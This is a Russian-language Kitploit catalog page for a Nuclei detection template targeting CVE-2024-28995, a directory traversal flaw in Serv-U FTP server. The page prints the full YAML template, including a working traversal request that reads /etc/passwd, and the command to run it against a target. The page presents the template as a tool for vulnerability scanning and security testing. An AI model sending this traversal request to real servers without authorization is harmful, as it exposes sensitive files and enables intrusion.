Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-28995-Nuclei-Template — Шаблон Nuclei для обнаружения CVE-2024-28995, уязвимости обхода пути в FTP-сервере Serv-U, позволяющей чтение файлов через специально созданные HTTP-запросы. | Kitploit
Инструменты/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Сканеры уязвимостейСканеры веб-уязвимостейАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Шаблон Nuclei для обнаружения CVE-2024-28995, уязвимости обхода пути в FTP-сервере Serv-U, позволяющей чтение файлов через специально созданные HTTP-запросы.

Репозиторий
142 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Шаблон Nuclei для CVE-2024-28995

Проверяет наличие уязвимости обхода каталога в Serv-U версии 15.4.2 и ниже, позволяющей читать чувствительные файлы, такие как /etc/passwd.

Детали шаблона

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Использование

Чтобы использовать этот шаблон с Nuclei, сохраните содержимое шаблона в файл с именем CVE-2024-28995.yaml и выполните следующую команду:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

Замените <target-url> на URL целевого ресурса, который вы хотите просканировать.

Контакты

По любым вопросам или для получения дополнительной информации вы можете связаться со мной через:

  • LinkedIn
  • Twitter
Скачать инструмент